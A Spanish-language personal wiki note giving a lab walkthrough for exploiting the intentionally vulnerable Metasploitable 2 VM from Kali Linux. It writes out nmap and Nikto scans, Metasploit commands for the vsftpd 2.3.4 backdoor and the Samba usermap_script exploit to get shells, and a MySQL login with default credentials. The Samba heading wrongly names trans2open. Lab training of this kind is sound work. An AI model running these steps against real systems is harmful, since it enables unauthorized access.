Notas de Luis

Plan de Evaluación y Explotación de Vulnerabilidades en Metasploitable 2

Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada específicamente para pruebas de seguridad y formación en ciberseguridad.

Paso 1: Configuración del Entorno

  • Descargar e instalar VirtualBox o VMware: Si no lo tienes ya, descarga e instala VirtualBox o VMware Workstation Player.
  • Descargar Metasploitable 2: Descarga la máquina virtual de Metasploitable 2 desde el sitio oficial de Rapid7.
  • Configurar la Máquina Virtual: Importa la máquina virtual de Metasploitable 2 en VirtualBox o VMware y asegúrate de que esté en la misma red que tu máquina Kali Linux (puedes usar una red NAT o una red interna para aislamiento).
  • Iniciar las máquinas virtuales: Inicia tanto Metasploitable 2 como Kali Linux.

Paso 2: Reconocimiento

Identificar la dirección IP de Metasploitable 2

  • En la terminal de Kali Linux, utiliza el comando nmap para identificar la dirección IP:
sudo nmap -sn 192.168.0.0/24
  • Encuentra la dirección IP de Metasploitable 2 en los resultados.

Escaneo de Puertos y Servicios

  • Realiza un escaneo completo de puertos y servicios en la IP de Metasploitable 2:
sudo nmap -A -T4 <IP-de-Metasploitable2>
  • Esto identificará los puertos abiertos y los servicios que se ejecutan en ellos.

Paso 3: Identificación de Vulnerabilidades

Buscar servicios vulnerables

  • Analiza los resultados del escaneo de Nmap para identificar servicios conocidos por ser vulnerables. Metasploitable 2 incluye servicios como FTP, SSH, Telnet, SMB, y varios otros.

Uso de Nikto para análisis de vulnerabilidades web

  • Ejecuta Nikto contra la IP de Metasploitable 2 para identificar vulnerabilidades en servicios web:
sudo nikto -h <IP-de-Metasploitable2>

Paso 4: Explotación de Vulnerabilidades

A continuación, se describen algunas vulnerabilidades comunes en Metasploitable 2 y cómo explotarlas.

Explotación de VSFTPD 2.3.4

  • Identificación: VSFTPD 2.3.4 es un servicio FTP que tiene una puerta trasera conocida.
  • Uso de Metasploit:
sudo msfconsole
  • Dentro de Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <IP-de-Metasploitable2>
exploit
  • Esto debería darte una shell en Metasploitable 2.

Explotación de Samba (SMB) usando el exploit de trans2open

  • Identificación: Samba 3.x tiene una vulnerabilidad conocida.
  • Uso de Metasploit:
sudo msfconsole
  • Dentro de Metasploit:
use exploit/multi/samba/usermap_script
set RHOST <IP-de-Metasploitable2>
exploit
  • Esto debería proporcionar acceso a una shell con privilegios de root.

Explotación de una vulnerabilidad en la base de datos MySQL

  • Identificación: MySQL en Metasploitable 2 tiene credenciales por defecto (root:root).
  • Explotación manual:
mysql -u root -p -h <IP-de-Metasploitable2>
  • Introduce la contraseña root.
  • Una vez dentro de la base de datos, puedes ejecutar comandos SQL maliciosos.

Paso 5: Documentación y Mitigación

  • Documentar las vulnerabilidades encontradas: Registra todas las vulnerabilidades identificadas, los métodos de explotación utilizados y los resultados obtenidos.
  • Recomendar medidas de mitigación: Sugiere cómo pueden solucionarse estas vulnerabilidades, como actualizar el software, cambiar credenciales por defecto, y deshabilitar servicios innecesarios.

Conclusión

Este plan proporciona una guía completa para la evaluación y explotación de vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye instrucciones detalladas y comandos específicos para facilitar el aprendizaje y la comprensión.

computing/hacking/metaexploitable2.txt · Última modificación: por 127.0.0.1